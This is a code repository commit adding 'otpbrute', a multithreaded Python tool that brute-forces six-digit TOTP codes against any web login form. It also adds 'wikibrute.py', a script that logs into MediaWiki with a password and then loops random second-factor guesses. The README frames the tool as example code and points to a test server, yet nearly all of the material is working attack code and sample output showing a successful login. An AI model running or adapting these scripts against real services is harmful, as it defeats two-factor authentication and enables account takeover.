~fincham/otpbrute

121f89101f633a50415e042b3accfa23b00c5bc9 — Michael Fincham 3 months ago main
Release
4 files changed, 348 insertions(+), 0 deletions(-)

A LICENSE
A README.md
A otpbrute
A wikibrute.py
A  => LICENSE +9 -0
@@ 1,9 @@
Copyright 2021 Michael Fincham

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

The software is provided "as is", without warranty of any kind, express or implied, including but not limited to the warranties of merchantability, fitness for a particular purpose and noninfringement. In no event shall the authors or copyright holders be liable for any claim, damages or other liability, whether in an action of contract, tort or otherwise, arising from, out of or in connection with the software or the use or other dealings in the software.

👍

A  => README.md +50 -0
@@ 1,50 @@
# otpbrute

Some example code to show how you could quickly iterate against a TOTP implementation in an authentication flow.

For instance, to attack DoI's `authorative` server (assuming TOTP rate limiting is disabled):

```
$ ./otpbrute --threads 16 http://localhost:8080/login '{"data": {"user": "test", "password": "test", "otp": "%s"}}' "successful"
2021-07-23 16:41:37,158 Starting OTP guessing, press Ctrl+C to stop...
2021-07-23 16:41:37,353 Starting 16 threads...
2021-07-23 16:41:55,479 Made 1600 guesses at ~ 88 guesses per second
2021-07-23 16:41:55,483 We think you'll be logged in after 9300 seconds (2021-07-23 19:16:55.483658), with a probability of 90%!

...

2021-07-23 18:04:47,298 Thread 14 succeeded with the code 632905:
Content-Type: application/json
Set-Cookie: Auth=49c7...; Path=/; Expires=Mon, 23 Aug 2021 06:04:47 GMT
Date: Fri, 23 Jul 2021 06:04:47 GMT
Content-Length: 42

{"status":1, "message":"Login successful"}
```

For a test server to attack, try https://github.com/pruby/otp-brute-test.

## Usage

```
usage: otpbrute [-h] [-X VERB] [-k] [--digits DIGITS] [--threads THREADS] [--grace GRACE] url request match

Quickly and sequentially guess OTP codes for a web login form. Michael Fincham <michael@hotplate.co.nz> 2020-08-09

positional arguments:
  url                   URL where requests should be sent (e.g. https://example.com/)
  request               JSON-encoded options to pass to the requests library, e.g. "{'data': {'otp': '%s'}", where %s will be replaced by the
                        generated OTP code in each request - set "data" or "json" keys accordingly for your application
  match                 response (headers and body, but not status line) regex to match on a "valid login", e.g. "^200 OK" or "Set-Cookie", as
                        applicable to your application

optional arguments:
  -h, --help            show this help message and exit
  -X VERB, --method VERB
                        request method to use, defaults to POST
  -k, --insecure        disable TLS validation
  --digits DIGITS       number of OTP digits, defaults to 6
  --threads THREADS     number of concurrent request threads to run, defaults to 1 (this will be slow)
  --grace GRACE         grace windows either side of the current one to use in estimating times, defaults to 1 (e.g. one code before and one code
                        after the current one)
```

A  => otpbrute +206 -0
@@ 1,206 @@
#!/usr/bin/python3

"""
Quickly and sequentially guess OTP codes for a web login form.

Michael Fincham <michael@hotplate.co.nz> 2020-08-09
"""

import argparse
import concurrent.futures
import datetime
import json
import logging
import re
import sys
import threading
import time
import warnings

from urllib3.exceptions import InsecureRequestWarning
import requests

logging.basicConfig(format="%(asctime)s %(message)s", level=logging.INFO)
total_guesses = 0
last_total_update = 0
guess_update_lock = threading.Lock()

has_scipy = True
try:
    from scipy.stats import binom
except:
    has_scipy = False


def die(message):
    print(f"error: {message}")
    sys.exit(1)


def request_thread(
    name,
    method,
    url,
    request,
    match,
    digits,
    chunk_start,
    chunk_end,
    insecure=False,
    testing=False,
):
    global total_guesses, last_total_update
    match = re.compile(match)
    with warnings.catch_warnings():
        if insecure is True:
            warnings.simplefilter("ignore", InsecureRequestWarning)

        current_otp = chunk_start
        start = time.time()
        guesses = 0
        while True:
            otp = str(current_otp).zfill(digits)
            parameters = json.loads(request.replace("%s", otp))
            response = requests.request(method, url, verify=not insecure, **parameters)
            headers = "\n".join([f"{k}: {v}" for k, v in response.headers.items()])
            if match.search(headers) or match.search(response.text):
                logging.info(
                    f"Thread {name} succeeded with the code {otp}:\n{headers}\n\n{response.text}"
                )
            guesses = guesses + 1
            if time.time() - start > 5:
                start = time.time()
                with guess_update_lock:
                    total_guesses = total_guesses + guesses
                    last_total_update = start
                    guesses = 0
            current_otp = current_otp + 1
            if testing or current_otp == chunk_end:
                return chunk_end - chunk_start


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description=__doc__)
    parser.add_argument(
        "url", help="URL where requests should be sent (e.g. https://example.com/)"
    )
    parser.add_argument(
        "request",
        help="""JSON-encoded options to pass to the requests library, e.g. "{'data': {'otp': '%%s'}", where %%s will be replaced by the generated OTP code in each request - set "data" or "json" keys accordingly for your application""",
    )
    parser.add_argument(
        "match",
        help="""response (headers and body, but not status line) regex to match on a "valid login", e.g. "^200 OK" or "Set-Cookie", as applicable to your application""",
    )
    parser.add_argument(
        "-X",
        "--method",
        type=str,
        default="POST",
        metavar="VERB",
        help="request method to use, defaults to POST",
    )
    parser.add_argument(
        "-k",
        "--insecure",
        action="store_true",
        help="disable TLS validation",
    )
    parser.add_argument(
        "--digits",
        type=int,
        default=6,
        help="number of OTP digits, defaults to 6",
    )
    parser.add_argument(
        "--threads",
        type=int,
        default=1,
        help="number of concurrent request threads to run, defaults to 1 (this will be slow)",
    )
    parser.add_argument(
        "--grace",
        type=int,
        default=1,
        help="grace windows either side of the current one to use in estimating times, defaults to 1 (e.g. one code before and one code after the current one)",
    )
    args = parser.parse_args()
    if args.threads < 1:
        die("'threads' must be at least 1")

    if "%s" not in args.request:
        die("'request' must contain %s to be replaced with an OTP")

    probability = (1 + args.grace * 2) / 10 ** args.digits
    count = 0
    logging.info("Starting OTP guessing, press Ctrl+C to stop...")

    # make an initial validation request before starting threads
    try:
        request_thread(
            "validation",
            method=args.method,
            url=args.url,
            request=args.request,
            match=args.match,
            digits=args.digits,
            chunk_start=0,
            chunk_end=10 ** args.digits - 1,
            insecure=args.insecure,
            testing=True,
        )
    except Exception as e:
        die(f"unable to make a test request, check your data specification ({e})")

    logging.info(f"Starting {args.threads} threads...")
    chunks_end = 10 ** args.digits
    chunk_size = chunks_end // args.threads
    chunks = [(i, i + chunk_size) for i in range(0, chunks_end, chunk_size)]
    start = time.time()
    last_update = start
    last_total_guesses = 0
    with concurrent.futures.ThreadPoolExecutor(max_workers=args.threads) as executor:
        threads = [
            executor.submit(
                request_thread,
                name=m,
                method=args.method,
                url=args.url,
                request=args.request,
                match=args.match,
                digits=args.digits,
                chunk_start=chunks[m][0],
                chunk_end=chunks[m][1],
                insecure=args.insecure,
                testing=False,
            )
            for m in range(0, args.threads)
        ]

        time.sleep(15)
        while True:
            with guess_update_lock:
                time_since_last_update = last_total_update - last_update
                guesses_since_last_update = total_guesses - last_total_guesses
                last_total_guesses = total_guesses
                last_update = last_total_update
                average = int(guesses_since_last_update / time_since_last_update)
                logging.info(f"Guessing at {average} guesses per second")
                if has_scipy is True:
                    estimated_p = 0
                    estimated_seconds = 0
                    while estimated_p < 0.9:
                        estimated_seconds += 300
                        estimated_p = 1 - binom.pmf(
                            k=0, n=average * estimated_seconds, p=probability
                        )
                    estimated_p = int(estimated_p * 100)
                    when = datetime.datetime.utcfromtimestamp(
                        start
                    ) + datetime.timedelta(seconds=estimated_seconds)
                    estimated_seconds = abs(time.time() - estimated_seconds - start)
                    logging.info(
                        f"We think you'll be logged in after {estimated_seconds} seconds ({when}), with a probability of {estimated_p}%!"
                    )

            time.sleep(90)

A  => wikibrute.py +83 -0
@@ 1,83 @@
#!/usr/bin/python3

"""
This is just a start of a script for brute forcing OTPs for MediaWiki.

Michael Fincham <michael@hotplate.conz> 2021-08-09
"""

from urllib3.exceptions import InsecureRequestWarning
import random
import sys
import warnings

import bs4 as bs
import requests

system_random = random.SystemRandom()


def random_otp(digits=6, rng=system_random):
    """
    Generate a random OTP code with the specified number of digits. Returns a string to avoid loss of leading zeroes.

    Technically this could be sequential but most of the time it barely matters (for a six digit code you only really start getting
    repeats after about a thousand guesses, at which point the window probably rolled anyway...)
    """
    return "".join(str(rng.randint(0, 9)) for _ in range(6))


def extract_wp_login_token(text):
    """
    Extract the wpLoginToken CSRF-ish thing required from a Mediawiki login page.
    """
    soup = bs.BeautifulSoup(text, "lxml")
    return soup.find("input", {"name": "wpLoginToken"}).get("value")


if __name__ == "__main__":
    with warnings.catch_warnings():
        warnings.simplefilter("ignore", InsecureRequestWarning)
        login_url = (
            "https://wiki.example.com/?title=Special:UserLogin&returnto=Main+Page"
        )

        session = requests.session()
        response = session.get(login_url, verify=False)
        login_token = extract_wp_login_token(response.text)

        payload = {
            "wpName": "hello",
            "wpPassword": "yes",
            "wpRemember": "1",
            "authAction": "login",
            "wpLoginToken": login_token,
        }

        headers = {
            "Content-Type": "application/x-www-form-urlencoded",
        }

        response = session.post(login_url, data=payload, verify=False)
        if "OATHToken" in response.text:
            print("Logged in successfully. Starting guess loop...")
        else:
            print("Couldn't log in :(")
            sys.exit(1)

        while "OATHToken" in response.text:
            login_token = extract_wp_login_token(response.text)
            code = random_otp()
            payload = {
                "OATHToken": code,
                "wploginattempt": "Continue login",
                "wpEditToken": "+\\",
                "title": "Special:UserLogin",
                "authAction": "login-continue",
                "force": "",
                "wpLoginToken": login_token,
            }

            response = session.post(login_url, data=payload, verify=False)
        print("Succeeded (or failed I guess) with the code %s:" % code)
        print(response.text)